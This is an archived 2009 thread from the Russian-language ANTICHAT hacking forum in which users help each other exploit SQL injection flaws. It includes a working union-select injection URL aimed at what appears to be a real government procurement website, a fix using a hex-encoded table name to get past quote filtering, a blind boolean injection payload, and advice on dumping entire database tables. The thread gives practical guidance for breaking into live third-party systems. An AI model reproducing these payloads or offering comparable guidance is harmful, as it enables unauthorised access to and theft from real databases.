ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.11.2009, 16:48
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Ins3t
спасибо, но я это уже глядел вот тут http://wiki.apache.org/httpd/DistrosDefaultLayout#Fedora_Core.2C_CentOS.2C_RHEL :
нужен перебор, руками не тянет.
на сервере стоит CentOS
|
|
|
08.11.2009, 17:02
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079
Репутация:
90
|
|
Сообщение от InFlame
Имеется следующая инъекция в UPDATE-запросе:
Код:
update session set value='last_url|s:5:"/[SQL-inj]";', update_date=now() where session_name='3nr3r857efj64a1kcbk7vpepn0'
Что полезного можно сделать в данном случае и как? Забыл сказать, что вывод только через ошибку или, если это возможно, вслепую.
|
|
|
|
08.11.2009, 17:37
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
какой софтиной можно слить все таблицы, а не использовать лимит (СИПТ не предлагать!) П.С.Работаю в 5 версии
|
|
|
|
08.11.2009, 17:52
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от jecka3000
какой софтиной можно слить все таблицы, а не использовать лимит (СИПТ не предлагать!) П.С.Работаю в 5 версии
гмм, чем group_concat не устраивает?  Файл прив есть? Кавычки режутся? А так софтин уйма, да и самому можно написать парсер 
|
|
|
|
08.11.2009, 17:55
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от DrAssault
гмм, чем group_concat не устраивает?
Хотябы тем, что он имеет ограничение на размер выводимых данных.
|
|
|
|
08.11.2009, 18:06
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Ins3t
Хотябы тем, что он имеет ограничение на размер выводимых данных.
Опять же в зависимости от ситуации и настроек администратора... именно поэтому были ещё вопросы
|
|
|
|
08.11.2009, 19:41
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
не могу дальше ничего сделать
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=user_privil eges--
пробовал перебовать и нех и просто с кавычками и с %27 - результата нет!
расскажите, что дальше? |
|
|
|
08.11.2009, 19:45
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
WHERE+TABLE_NAME=0x757365725f70726976696c65676573
Все работает
InFlame, заюзай мор1ров например
var=blabla'+or+if(substring((select+version()),1,1 )=5,1,(select+1+union+select+2))--+
Последний раз редактировалось ElteRUS; 08.11.2009 в 19:53..
|
|
|
|
08.11.2009, 19:45
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 jecka3000
http://www.goszakaz.inconnect.ru/?id=10001&n=-3402+union+select+1,COLUMN_NAME,3,4,5,6+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x757365725 f70726976696c2065676573--
|
|
|
|
08.11.2009, 19:47
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
USER_PRIVILEGES - таблица базы Information_schema. Никакой полезной инфы для тебя (пассы, логины и т.Д.) она не даст
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
